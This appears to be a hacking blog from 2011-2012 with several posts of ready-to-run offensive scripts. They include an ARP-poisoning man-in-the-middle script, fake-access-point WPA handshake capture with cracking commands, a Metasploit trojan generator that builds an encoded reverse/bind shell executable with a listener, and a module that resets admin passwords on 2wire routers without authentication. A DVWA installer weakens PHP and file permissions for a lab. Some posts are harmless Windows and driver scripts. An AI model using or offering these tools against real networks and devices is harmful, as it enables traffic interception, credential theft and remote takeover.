Tuesday, March 27, 2012

arppoison.sh - A script for to simplify ARP Poisoning for MITM attacks

   Last Night I found this script which is a script I coded years ago, 2007 to be exact. I love it when I find old stuff like this so I thought I would share it here. The script is called arppoison.sh and as the name suggest it is used to ARP poison two targets using arpspoof. Since it uses arpspoof you need to have it install. If you are using backtrack 5 it should already be installed. If you are using Ubuntu you can easily install it using apt-get to download the dsniff suite like so:

sudo apt-get install dsniff
This script is really simple to use:
  1. copy the text below into a word editor like nano or gedit.
  2. save it as arppoison.sh.
  3. run the following command against it: chmod +x arppoison.sh
  4. use the following command to run it: sudo ./arppoison.sh
  5. enter in the victim IP
  6. enter in the Gateway IP (i.e. the router)
  7. sit back as it enables IP forwarding and launches another shell running arpspoof.

   While this script is simple it is useful as it helps speed up the time it takes to launch these attacks by handling the ip forwarding configuration, launching the attack in a separate shell saving you from having to start another and load it to root. Pretty much just launch it and keep working. The code for the script is below the screen shot. Don't forget to change the niccard variable to whatever your adapter is called (in my case wlan0). Hope this helps and feel free to let me know if you have any questions.





==================================================================

#!/bin/bash
niccard=wlan0
if [[ $EUID -ne 0 ]]; then
echo -e "\n\t\t\t\033[1m \033[31m Script must be run as root! \033[0m \n"
echo -e "\t\t\t Example: sudo $0 \n"
exit 1
else
echo -e "\n\033[1;32m#######################################"
echo -e "# ARP Poison Script #"
echo -e "#######################################"
echo -e " \033[1;31mCoded By:\033[0m Travis Phillips"
echo -e " \033[1;31mDate Released:\033[0m 03/27/2012"
echo -e " \033[1;31mWebsite:\033[0m http://theunl33t.blogspot.com\n\033[0m"
echo -n "Please enter target's IP: "
read victimIP
echo -n "Please enter Gateway's IP: "
read gatewayIP
echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
echo -e "\t\t--==[Targets]==--"
echo -e "\t\tTarget: $victimIP"
echo -e "\t\tGateway: $gatewayIP \n\n"
echo -e "[*] Enabling IP Forwarding \n"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi

==================================================================

Wednesday, January 18, 2012

Ubuntu 11.10, aireplay-ng, and the "mon0 is on channel -1" error and how to fix it - shell script included

I had recently upgrade my Ubuntu install to 11.10. Along with other annoyances I came across I ran into a bit of a deal breaker when I went to run aireplay-ng. I was getting the following error:

mon0 is on channel -1, but the AP uses channel [#]


This was going to be a huge problem since I know that my ZyDAS 1211 chip set was compatible with packet injection. After searching around for a bit I found a great solution from this site here about the drivers and how to patch and reinstall the older ones back in. Below I have a script that you can run to get that installed.

Driver Patcher in action.

==================================================================


#!/bin/bash
#
# This fix was found at:
# http://linux-software-news-tutorials.blogspot.com/2011/06/solve-error-mon0-is-on-channel-1-but-ap.html
#
# If this script helps you be sure to drop him a line and
# say thanks!
echo -e "\n\033[1;32m###########################################"
echo -e "# Ubuntu Patched Drivers Installer Script #"

echo -e "# Tested on Ubuntu 11.04 and 11.10 #"
echo -e "###########################################"
echo " Coded By: Travis Phillips"
echo " Date: 01/18/2012"
echo " Website: http://theunl33t.blogspot.com"
echo -e -n "\n[*] Installing build-essential...\033[0m"
sudo apt-get -y install build-essential &> /dev/null
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Downloading Wireless Drivers...\033[0m"
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2011-06-16.tar.bz2 &> /dev/null
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Extracting...\033[0m"
tar -jxf compat-wireless-2011-06-16.tar.bz2
cd compat-wireless-2011-06-16
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Downloading Patches...\033[0m"
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch &>12 /dev/null
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch &>12 /dev/null
echo -e "\033[1;32mDone!"
echo -e -n "\n[*] Applying Patches...\033[0m"
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch &> /dev/null
patch ./net/wireless/chan.c channel-negative-one-maxim.patch &> /dev/null
echo -e "\033[1;32mDone!"
echo -e "\n[*] Building patched drivers and installing."
echo -e "\n\t\033[31mTHIS WILL TAKE ABOUT 5-10 mins..."
echo -e "\tPlease be patient and do *NOT* interrupt this process\033[0m\n"
make &> /dev/null
echo -e "\t \033[1;32m[*] Compiling Complete. Installing Drivers...\033[0m\n"
sudo make install &> /dev/null
echo -e "\033[1;32m[*] Installing Patched drivers completed!"
echo -e -n "\n[*] Cleaning Up...\033[0m"
cd ..
rm compat-wireless-2011-06-16.tar.bz2
rm -rf compat-wireless-2011-06-16
echo -e "\033[1;32mDone!"
echo -e "\n\n\t\t[*] \033[1;37mScript Finished! Please reboot to finish the patch.\033[0m\n\n"



==================================================================

To run save it to a save to a file called patchwifidrivers.sh and in a terminal type

chmod +x patchwifidrivers.sh
./patchwifidrivers.sh


Hope this helps some people.

Monday, October 3, 2011

The Many Faces Of God Mode In Windows 7 - With Script

Some of you may already be familiar with "God Mode" in windows 7. It was a special tool which the Windows developer team left for their sake to make enabling and disabling several of Windows functions quick and easy. However there are more than one of these, I have found 39 and will show you how to access them and also provide a script to do that. It should be noted that these are for Windows 7 and will not work on windows XP (although there are some GUID tricks there to, these just aren't them). The default God Mode was to add ".{ED7BA470-8E54-465E-825C-99712043E01C}" to the end of a folder. So for example if you create a folder titled "Main GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}" it would create a folder called "Main GodMode" which when double-clicked would give you what you see below instead of an empty folder.

God Mode folder View

However, this is just another parlor trick by the windows explorer. Looking at it from the command line and you will see it's still just a folder, But windows handles it differently.

CMD view of the folder

Looking into the Windows Registry, you can see it is actually accessing a DLL Function in the shell32.dll file in the system32 folder.

Registry view of HKEY_CLASSES_ROOT\CLSID\{ED7BA470-8E54-465E-825C-99712043E01C}

With some searching I was able to create a batch file script that will create these "Modules". The script will create a folder in where every it is run called "GodModes" then create 39 known God Mode folders under it for you to use, which gives you a decent "this is what the Control Panel should have been" Folder.

View of the GodMode Folder from the script.

Without further delay. Here is the script.
==================================================================
@echo off
rem \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
rem \\ this script will create a folder in it's \\
rem \\ Current Directory called GodModes and then \\
rem \\ create several "God Mode folders under it \\
rem \\ Which in Windows vista\7 will trigger some \\
rem \\ Control Panel as well as hidden functions \\
rem \\ Hidden in some of windows system DLLs. \\
rem \\ \\
rem \\ Note: Some of these do NOT work on vista. \\
rem \\ For Those it will just show a folder. \\
rem \\ Also one of these only works on win7 Ultimate\\
rem \\ Which is the BitLocker Module \\
rem \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
echo.
echo ***********************************************
echo Enable Windows 7 God Mode Modules v1.0
echo ***********************************************
echo Coded By: Travis Phillips
echo on: 10/03/2011
echo.
echo [*] Creating folder .\GodMode
mkdir "GodModes"
echo.
echo [*] Changing to .\GodMode
cd GodModes
echo.
echo [*] Creating GodMode "Default Geolocation"...
mkdir "Default Geolocation.{00C6D95F-329C-409a-81D7-C46C66EA7F33}"
echo.
echo [*] Creating GodMode "Biometrics"...
mkdir "Biometrics.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}"
echo.
echo [*] Creating GodMode "Power Plan"...
mkdir "Power Plan.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}"
echo.
echo [*] Creating GodMode "Personalization Control Panel"...
mkdir "Personalization Control Panel.{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}"
echo.
echo [*] Creating GodMode "Taskbar Notitification Area"...
mkdir "Taskbar Notitification Area.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}"
echo.
echo [*] Creating GodMode "Administration Tools"...
mkdir "Administration Tools.{D20EA4E1-3957-11d2-A40B-0C5020524153}"
echo.
echo [*] Creating GodMode " Windows Vault (Credential Manager - Auto Logon)"...
mkdir "Windows Vault (auto logon).{1206F5F1-0569-412C-8FEC-3204630DFB70}"
echo.
echo [*] Creating GodMode "Ease of Access"...
mkdir "Ease of Access.{D555645E-D4F8-4c29-A827-D93C859C4F2A}"
echo.
echo [*] Creating GodMode "Install Program from the Network"...
mkdir "Install Program from the Network.{15eae92e-f17a-4431-9f28-805e482dafd4}"
echo.
echo [*] Creating GodMode "Network Map"...
mkdir "Network Map.{E7DE9B1A-7533-4556-9484-B26FB486475E}"
echo.
echo [*] Creating GodMode "Default Programs"...
mkdir "Default Programs.{17cd9488-1228-4b2f-88ce-4298e93e0966}"
echo.
echo [*] Creating GodMode "Windows SideShow"...
mkdir "Windows SideShow.{E95A4861-D57A-4be1-AD0F-35267E261739}"
echo.
echo [*] Creating GodMode "DOT NET Framework Modules"...
mkdir "DOT NET Framework Modules.{1D2680C9-0E2A-469d-B787-065558BC7D43}"
echo.
echo [*] Creating GodMode "GPS Sensors"...
mkdir "GPS Sensors.{E9950154-C418-419e-A90A-20C5287AE24B}"
echo.
echo [*] Creating GodMode "Manage Wireless Networks"...
mkdir "Manage Wireless Networks.{1FA9085F-25A2-489B-85D4-86326EEDCD87}"
echo.
echo [*] Creating GodMode "Network"...
mkdir "Network.{208D2C60-3AEA-1069-A2D7-08002B30309D}"
echo.
echo [*] Creating GodMode "My Computer"...
mkdir "My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
echo.
echo [*] Creating GodMode "Computers and Devices"...
mkdir "Computers and Devices.{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}"
echo.
echo [*] Creating GodMode "Manage Printers"...
mkdir "Manage Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}"
echo.
echo [*] Creating GodMode "Recent Places"...
mkdir "Recent Places.{22877a6d-37a1-461a-91b0-dbda5aaebc99}"
echo.
echo [*] Creating GodMode "Bluetooth Devices"...
mkdir "Bluetooth Devices.{28803F59-3A75-4058-995F-4EE5503B023C}"
echo.
echo [*] Creating GodMode "Workspaces Center (Remote Connections)"...
mkdir "Workspaces Center (Remote Connections).{241D7C96-F8BF-4F85-B01F-E2B043341A4B}"
echo.
echo [*] Creating GodMode "Windows Firewall"...
mkdir "Windows Firewall.{4026492F-2F69-46B8-B9BF-5654FC07E423}"
echo.
echo [*] Creating GodMode "Favorites"...
mkdir "Favorites.{323CA680-C24D-4099-B94D-446DD2D7249E}"
echo.
echo [*] Creating GodMode "Windows Update"...
mkdir "Windows Update.{36eef7db-88ad-4e81-ad49-0e313f0c35f8}"
echo.
echo [*] Creating GodMode "Rate and Improve Computer Preformance"...
mkdir "Rate and Improve Computer Preformance.{78F3955E-3B90-4184-BD14-5397C15F1EFC}"
echo.
echo [*] Creating GodMode "Main Godmode"...
mkdir "Main Godmode.{ED7BA470-8E54-465E-825C-99712043E01C}"
echo.
echo [*] Creating GodMode "Speech Recognition"...
mkdir "Speech Recognition.{58E3C745-D971-4081-9034-86E34B30836A}"
echo.
echo [*] Creating GodMode "User Accounts"...
mkdir "User Accounts.{60632754-c523-4b62-b45c-4172da012619}"
echo.
echo [*] Creating GodMode "Action Center"...
mkdir "Action Center.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}"
echo.
echo [*] Creating GodMode "Backup and Restore"...
mkdir "Backup and Restore.{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}"
echo.
echo [*] Creating GodMode "Backup and Restore"...
mkdir "Display.{C555438B-3C23-4769-A71F-B6D3D9B6053A}"
echo.
echo [*] Creating GodMode "Recovery"...
mkdir "Recovery.{9FE63AFD-59CF-4419-9775-ABCC3849F861}"
echo.
echo [*] Creating GodMode "AutoPlay"...
mkdir "AutoPlay.{9C60DE1E-E5FC-40f4-A487-460851A8D915}"
echo.
echo [*] Creating GodMode "BitLocker Drive Encryption (Ultimate edition only)"...
mkdir "BitLocker Drive Encryption (Ultimate edition only).{D9EF8727-CAC2-4e60-809E-86F80A666C91}"
echo.
echo [*] Creating GodMode "Font Settings"...
mkdir "Font Settings.{93412589-74D4-4E4E-AD0E-E0CB621440FD}"
echo.
echo [*] Creating GodMode "Parental Controls"...
mkdir "Parental Controls.{96AE8D84-A250-4520-95A5-A47A7E3C548B}"
echo.
echo [*] Creating GodMode "Sync Center"...
mkdir "Sync Center.{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}"
echo.
echo [*] Creating GodMode "System Information"...
mkdir "System Information.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}"
echo.
echo [*] Changing back to .\
cd ..
==================================================================

Friday, September 2, 2011

No Access Point? No Problem!: How to get a WPA\WPA2 keys 4-way handshake using Airbase-ng

Today we are going to look into how to get a WPA\WPA2 keys 4-way handshake from a client using Airbase-ng without them being connected or near their access point. This is useful as a lot of machines will throw beacon probes out for old access points they've connected to (you will see them while running airodump-ng at the bottom right). This means it is looking for that Access Point and wants to connect to it. What we will do with Airbase-ng is pretend we are that access point and let it attempt to connect to us.

So for this tutorial I will be using:
- One Attacker Box running BackTrack 5
- One laptop running XP or 7 pre-configured to connect to a SSID of linksys with a WPA2 key set

Step 1: Going in to Monitor Mode

With that said let's first get things setup on the hacking machine by setting our wireless card into monitor mode using airmon-ng. since my wireless interface is "wlan0" I would use the command "airmon-ng start wlan0". This will give us a virtual interface called "mon0" which is in monitor mode

Airmon-ng setting wlan0 to monitor mode.

Step 2a: Setting up the fake AP (Single Known Target Method)

Use this method if you know the Targets AP ESSID or you only want to attack that one; otherwise use Step 2b instead but still read this section to get a better understanding first. Next let's taking a moment to look at the help options for airbase-ng, pictured below.

Airbase-ng Help

So now let's set up our options here. For this attack I'm going to use the following command.(Note: This is case sensitive so pay close attention to this)

airbase-ng -F ./Desktop/WPA-attack.cap --essid linksys -Z 2 -c 1 -i mon0 mon0


I owe you a little explanation of what the command does. here's quick break down of what this command does as per the help screen.

usage: airbase-ng <options> <replay interface>
  • -F prefix : write all sent and received frames into pcap file
  • --essid <ESSID> : specify a single ESSID (short -e)
  • -Z type : same as -z, but for WPA2. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
  • -c channel : sets the channel the fake AP is going to run on
  • -i iface : capture packets from this interface
So, basically this command will set up mon0 to listen and answer (-i mon0 mon0) as a WPA2-TKIP access Point (-Z 2) running on channel 1 (-c 1) with the SSID of linksys (--essid linksys) and log all packets to a log file on the desktop (-F ./Desktop/WPA-attack.cap).

Airbase-ng in Action

Above is a console picture of it in action. As you can see in the last 3 lines the machine is attempting to authenicate to our fake AP, once you see this line once it is safe to open another terminal and try to open the pcap file (in my case ./Desktop/WPA-attack.cap-01.cap) with aircrack-ng to confirm you got a handshake.

Aircrack-ng shows we have the handshake!

So on this note, we see we got a handshake!

Step 2b: Setting up the fake AP (Unknown Target Method)

Warning: This method will attempt to attack every probe it sees! if you didn't know the ESSID of the client or just wanted to attack everyone in the area (airport or coffee shop anyone?) use this type of command.

airbase-ng -P -C 500 -Z 2 -c 1 -i mon0 -F ./Desktop/Probe_hits mon0

It's Pretty much the same as the one from step 2 expect instead of using "--essid linksys" we used "-P -C 500" (case sensitive. So note they are uppercase switches)

usage: airbase-ng <options> <replay interface>
  • -F prefix : write all sent and received frames into pcap file
  • -P : respond to all probes, even when specifying ESSIDs
  • -C seconds : enables beaconing of probed ESSID values (requires -P)
  • -Z type : same as -z, but for WPA2. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
  • -c channel : sets the channel the AP is running on
  • -i iface : capture packets from this interface

Airbase-ng Responding to all beacons.

With this approach I changed the victims wireless connection settings from linksys to "testing" as you can see it found it, repeated it, and allow the client to connect. Thus also getting the handshake same as above.

Step 3a: Cracking it with Cowpatty and rainbow tables

This is my preferred method of cracking WPA/WPA2. However Cowpatty (even the install on backtrack) will by default not detect the 4-way handshake obtained with these methods unless you patch it. You can patch it with an article I wrote on how to do this step-by-step or via a script that I coded for that, both of which can be found here. With Cowpatty patch just use the following command:

Command to crack using Cowpatty.

cowpatty -r ./Desktop/WPA-attack.cap-01.cap -s linksys -d linksysHashTable

In this command the -r points cowpatty to the Capture file with the handshake. The -s is used to indicate the ESSID to the program. Finally, the -d points to my rainbow table for this SSID. If you need rainbow tables for Cowpatty the I recommend you checkout the church of WiFi set from renderlabs webpage as they have a free set containing 33GB of tables made from the top 1,000 SSIDs seen on WiGLE (Wireless Geographic Logging Engine) which is a community for wardrivers to upload their GPS wardriving data and mapped on the site for all to see.



If that image isn't encourgement to get your rainbow tables I don't know what is. Cracked after 395,442 try in about 2.5 seconds!!! So worth the download and space to keep these handy. If the SSID is one not in the kit you can make it following this post here.

Step 3b: Cracking it with aircrack-ng using a Dictionary

In this attack we will use Aircrack-ng with a the default dictionary that comes with BackTrack (located under /pentest/password/wordlist/darkc0de.lst). This is just to show you a second method and give you something to compare the time difference on rainbow table vs. dictionary attacks. To run it just do the following:

aircrack-ng ./Desktop/WPA-attack.cap-01.cap -w /pentest/password/wordlist/darkc0de.lst

Aircrack-ng target selection
On mine it was number two but just hit the number next to the network with the handshake you are attacking. You should see it start to run the attack.

Aircrack-ng Finished Cracking
As you can see this worked too but it took 16 mins instead of 2 seconds. Whichever method is easier for you, that's the one to use. Hope this helps some people, if you have any questions feel free to leave a question in the comments area.

Enjoy and stay out of trouble! ;-)

Tuesday, August 23, 2011

installDVWA.sh - Script to Download, Configure, and launch Damn Vulnerable Web App on Backtrack 5

So I recently need to automate this process as it had to be done on over 30 machines and I'm lazy and if I have more than once it's getting automated. This thing will get DVWA (Damn Vulnerable Web App) download, unzipped, upload in your web root, configured, and start apache and mysql, setup the mysql database with the DVWA data in ~30-45 seconds.

So first a screenshot of it:

ScreenShot of installDVWA.sh

And of course, you'll probably want the code so here it is. ;-)
==================================================================
#/bin/bash
echo -e "\n#######################################"
echo -e "# Damn Vulnerable Web App Installer Script #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e -n "\n[*] Changing directory to /var/www..."
cd /var/www > /dev/null
echo -e "Done!\n"

echo -n "[*] Removing default index.html..."
rm index.html > /dev/null
echo -e "Done!\n"

echo -n "[*] Changing to Temp Directory..."
cd /tmp
echo -e "Done!\n"

echo "[*] Downloading DVWA..."
wget http://voxel.dl.sourceforge.net/project/dvwa/DVWA-1.0.7.zip
echo -e "Done!\n"

echo -n "[*] Unzipping DVWA..."
unzip DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"

echo -n "[*] Deleting the zip file..."
rm DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"

echo -n "[*] Copying dvwa to root of Web Directory..."
cp -R dvwa/* /var/www > /dev/null
echo -e "Done!\n"

echo -n "[*] Clearing Temp Directory..."
rm -R dvwa > /dev/null
echo -e "Done!\n"

echo -n "[*] Enabling Remote include in php.ini..."
cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini1
sed -e 's/allow_url_include = Off/allow_url_include = On/' /etc/php5/apache2/php.ini1 > /etc/php5/apache2/php.ini
rm /etc/php5/apache2/php.ini1
echo -e "Done!\n"

echo -n "[*] Enabling write permissions to /var/www/hackable/upload..."
chmod 777 /var/www/hackable/uploads/
echo -e "Done!\n"

echo -n "[*] Starting Web Service..."
service apache2 start &> /dev/null
echo -e "Done!\n"

echo -n "[*] Starting MySQL..."
service mysql start &> /dev/null
echo -e "Done!\n"

echo -n "[*] Updating Config File..."
cp /var/www/config/config.inc.php /var/www/config/config.inc.php1
sed -e 's/'\'\''/'\''toor'\''/' /var/www/config/config.inc.php1 > /var/www/config/config.inc.php
rm /var/www/config/config.inc.php1
echo -e "Done!\n"

echo -n "[*] Updating Database..."
wget --post-data "create_db=Create / Reset Database" http://127.0.0.1/setup.php &> /dev/null
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/gordonb.jpg" where user = "gordonb";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/smithy.jpg" where user = "smithy";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/admin.jpg" where user = "admin";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/pablo.jpg" where user = "pablo";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/1337.jpg" where user = "1337";'
echo -e "Done!\n"

echo -e -n "[*] Starting Firefox to DVWA\nUserName: admin\nPassword: password"
firefox http://127.0.0.1/login.php &> /dev/null &
echo -e "\nDone!\n"
echo -e "[\033[1;32m*\033[1;37m] DVWA Install Finished!\n"
==================================================================

Thursday, July 14, 2011

Script to simple using msfpayload & msfencode to create metasploit payload trojans

The following is a script I coded to simplify the ease of use for using msfpayload and msfencode to create a windows based trojan and set up the listener. Let's face it, scripting is faster and easier. Also insures it is uniform and automated.

The script will do the following:
  • Determine your IP address automatically for the LHOST of the payload.
  • Ask if you want a shell or meterpreter
  • Ask if you want it reverse connection or Bind port TCP
  • Request the Port number.
  • at that point it will create two files
  • trojan.exe - your virus payload
  • msf_Trojan_Listener - a file with a one liner to create the metasploit listener that works with your payload.
  • Next it will start msfcli to create a listener.

Here is a screenshot of it in action:

Screen Shot 1 of msf_trojan_generator
Screen Shot 2 of msf_trojan_generator

And of course, you'll probably want the code so here it is. ;-)
==================================================================
#!/bin/bash
ENCODINGTIMES=5
IP=`ifconfig | grep 'inet addr' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
echo -e "\n#######################################"
echo "# MSF Trojan Generator v1.0 #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e "\nYour IP = " $IP
echo -e -n "\n what type of trojan? \n 1) meterpreter \n 2) shell \n\n Which is it: "
read METERORSHELL
echo -e -n "\n What kind of trojan? \n 1) Reverse Connection \n 2) bind_TCP \n\n Which is it: "
read LISTENORREVERSE
echo -e -n "\n What port number are we going to use: "
read PORTNUM

if [ $LISTENORREVERSE = "1" ]; then
 LORR='reverse_tcp'
 LHOST='LHOST='
else
 LORR='bind_tcp'
 LHOST=''
 IP=''
 echo -e "\n Since you want a bind port\nwhat is the IP of the remote host: "
 read REMOTEHOST
 RH='RHOST='
fi

if [ $METERORSHELL = "1" ]; then
 SHELLTYPE='meterpreter'
else
SHELLTYPE='shell'
fi

echo -e "\n[*] Generating trojan with the following: \n -"$SHELLTYPE"/"$LORR "\n -"$LHOST$IP$RH$REMOTEHOST "\n -PORT=" $PORTNUM
echo -e "\n this can take some time. Please wait...\n"

msfpayload windows/$SHELLTYPE/$LORR $LHOST$IP LPORT=$PORTNUM R | msfencode -t exe -o ./trojan.exe -c $ENCODINGTIMES
echo -e "\n[*] Done generating `pwd`/trojan.exe! \n"
ls -l trojan.exe
echo -e "\n[*] Now running listener:\n msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E\n\nNOTE: also saving this to `pwd`/msf_Trojan_Listener for a simple cat/paste later."
echo "msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E" > msf_Trojan_Listener
msfcli multi/handler PAYLOAD=windows/$SHELLTYPE/$LORR $LHOST$IP$RH$REMOTEHOST LPORT=$PORTNUM E

==================================================================

Wednesday, June 22, 2011

Metasploit module to reset admin password on 2wire wireless routers.

UPDATE: This module is now a part of metasploit. just run msfupdate and it should be under auxiliary/admin/2wire/xslt_password_reset. For details, see here

Here is a metaploit module I coded to reset the password on a 2wire router. It uses a setup wizard page that doesn't verify if the user is authenticated nor remove itself after first time setup. This can be exploited to reset the password. Without further delay, here is the code.

on my ubuntu box I placed this under /opt/metasploit3/msf3/modules/auxiliary/admin/2wire/2wirepasswordreset.rb

=====================================================
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => '2Wire Password Reset',
'Version' => '$Revision: 1 $',
'Description' => %Q{
This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard
page that fails to check if a user is authenicated and doesn't remove or block after first access.
},
'Author' => 'Travis Phillips',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptString.new('PASSWORD', [ true, 'What you want the password reset to', 'admin'])
], self.class)

end

def run
begin
print_status("Attempting to rest password to #{datastore['PASSWORD']} on #{rhost}\n")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => '/xslt',
'data' => 'PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=' + datastore['PASSWORD'] + '&PASSWORD_CONF=' + datastore['PASSWORD'] + '&HINT=',
}, 25)
if (res.code == 200)
if (res.headers['Set-Cookie'])
print_status("Password reset successful!\n")
end
end
end
end
end
=====================================================